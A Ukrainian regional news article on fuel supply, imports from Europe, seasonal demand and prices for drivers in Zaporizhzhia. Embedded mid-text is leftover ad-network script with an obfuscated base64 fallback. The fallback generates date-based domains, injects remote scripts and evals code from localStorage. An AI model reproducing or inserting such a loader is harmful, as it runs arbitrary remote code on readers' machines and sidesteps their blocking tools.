Що буде з паливом восени і чого чекати водіям в Запоріжжі: прогнози експертів

На початку повномасштабного вторгнення рф, коли країна-агресор знищувала нафтобази з переробкою, в Україні спричинився жорсткий дифіцит палива. Зараз ситуація почала покращуватися: на АЗК зменшилися черги за бензином і дизелем — як і ліміти на пальне, а ціни на автогаз знижуються щодня.

Про те, якою буде ситуація з паливом найближчим часом, до чого готуватись і чого чекати українським водіям — інформує Акцент з посиланням на статтю Уніан.

Паливо в Україні: що з ним зараз

Як вже зазначено вище, під кінець червня низка українських мереж АЗС почала активно зменшувати ліміти на відпуск пального, на заправках практично зникли черги, падати стали також і ціни на паливо, особливо — на скраплений газ.

До слова, як раніше інформував Акцент, народний депутат Андрій Герус під час брифінгу у Медіацентрі Україна-Укрінформ заявив, що у липні на українських АЗС взагалі зникнуть обмеження щодо кількості палива для водіїв.

В липні розпочався період жнив — зернові культури достигають на більшій частині України: їх треба збирати сільгосптехнікою, яка у своїй більшості працює на дизельному паливі. Враховувати необхідно й величезні і, безперечно, першочергові потреби української армії у пальному.

Починаючи з середини липня і по жовтень аграрії будуть проводити активний збір врожаїв різноманітних сільськогоспкультур і висаджувати озимі культури — тож попереду очікується сезонний пік споживання бензину та дизелю: за прогнозами експертів, у цей період споживання пального може збільшитися на третину.

Поставки палива: яка ситуація наразі

Через російські ракетні атаки повністю або частково знищено майже 30 нафтобаз по всій Україні, вщент також зруйновано Кременчуцький НПЗ — єдиний нафтопереробний завод в країні.

«Вітчизняний ринок палива, що раніше постачався переважно пальним із Росії, Білорусі та через морські порти, з початком широкомасштабного наступу російської варварської орди переорієнтувався на постачання з Європи виключно сухопутним транспортом, здебільшого з Польщі та Румунії», — йдеться в статті.

Як запевняють в Офісі президента, ситуація стосовно ДТ в окремих регіонах повністю вирішена, а без проблем заправитися бензином українські водії зможуть максимум через місяць. Очевидно, що мова іде про регіони, в яких не проходять бойові дії — бо чим ближче до лінії фронту, тим важче знайти пальне.

На даний момент, дійсно помітна стабілізація імпортних поставок майже по всій Україні. Як зазначив нардеп Андрій Герус, у червні на український ринок зайшло понад 600 тисяч тонн нафтопродуктів, 400 тисяч тонн – це дизель, 200 тисяч – бензин та скраплений газ — все надійшло з європейських ринків.

З початку повномасштабної війни рф проти України кількість імпортерів дизелю зросла майже у чотири рази, а бензину — у два рази: в той же час, серйозний приріст зафіксовали в червні-липні – плюс сто дві компанії, а компаній-постачальників скрапленого газу збільшилося більше на чверть. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

«Згідно з даними митниці, за півроку кількість імпортних закупок нафтопродуктів у порівнянні з минулим роком залишились на тому ж рівні. При цьому за рахунок суттєвого зростання цін на нафту в світі, в грошовому вимірі наша країна витратила на ці потреби вдвічі більше ніж минулоріч — $3,26 млрд. Такі витрати на оптові закупки наочно можна побачити в цінах пального на АЗС, які за час війни зросли на 70-100%», — розповідають в публікації.

Які можуть виникнути труднощі

Внаслідок підвищеного попиту з боку українських компаній портова перевалка нафтопродуктів в Румунії і Болгарії вже є перевантаженою, а в Польщі взагалі відсутні вільні потужності, щоб забезпечити перевалку палива для ринку України.

Водночас, у країнах ЄС також зростає власне сезонне споживання: очевидно, що навіть вкрай лояльні до України чиновники поставлять в пріоритет задоволення внутрішніх потреб своїх країн. Отже пальне до України потраплятиме за залишковим принципом.

Спричиняє тиск також і поступова відмова Європи від енергоносіїв з росії: щоб більше не повернутись у гостру фазу дефіциту, шалених черг і захмарних цін на пальне, бізнес за сприянням держави має вже зараз ще більше розширювати канали постачання.

«Наприклад, в Румунії та Болгарії є можливість не приймати суворі обмеження для захисту власного ринку, а Німеччина здатна забезпечувати більш ефективну логістику постачання нафтопродуктів в Україну з портів Бельгії та Нідерландів. Про це і потрібно домовлятись», — йдеться в статті.

Яким є вихід

Наразі весь світ вступив в епоху дефіциту енергоресурсів — у ньому важливу роль відіграє поведінка споживачів і водії мають розуміти, що використовувати власне авто має сенс тільки у вкрай необхідному випадку.

«Любителям заливати пальне одразу як тільки в баку з’являються вільні десять літрів, варто знати, що саме такі дії спричиняють черги на заправках та створюють спекулятивний попит. Це б’є і по ціні. Власники АЗС бачать, що люди через психологічну напругу більше споживають, тому і не цураються завищувати цінники на бензин та дизель», — підкреслюють у публікації.

Гарним прикладом є зміни вартості автомобільного газу: лише за крайній тиждень скраплений газ знизився у ціні майже на 4 гривні — до 33,5 грн за літр. Зменшення роздрібних цін зумовлене профіцитом постачання автогазу в Україну та врівноваженим споживанням.

Середня ціна на скраплений газ за тиждень (з 8 по 15 липня) у мережах АЗС знизилася на 3,61 грн/л – до 33,52 грн/л. Джерело: enkorr Висновки розслаблятися поки зарано, як і вважати, що дефіцит пального вже повністю позаду;нема ніяких гарантій, що більш-менш налагоджені під час війни ланцюжки постачання з Європи збережуть можливість підтримувати поточний рівень імпорту;вихід з ситуації для водіїв один – економія пального та його раціональне використання;зменшуючи власне споживання пального, українці залишають більше ресурсів для української армії, чим наближають перемогу України.

Як раніше повідомляв Акцент, поки усі дошкільні заклади у Запоріжжі закриті, місто активно готується до можливого очного нового навчального сезону з першого вересня. За останніми вимогами у кожному садочку повинні бути облаштовані бомбосховища.
(adsbygoogle = window.adsbygoogle || []).push({});

В Запорізьких дитсадках готують укриття: що там повинно бути (ВІДЕО) Подписывайтесь на Акцент в ПІДТРИМКА САЙТУ АКЦЕНТ Источник: https://akzent.zp.ua/shho-bude-z-palivom-voseni-i-chogo-chekati-vodiyam-v-zaporizhzhi-prognozi-ekspertiv/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top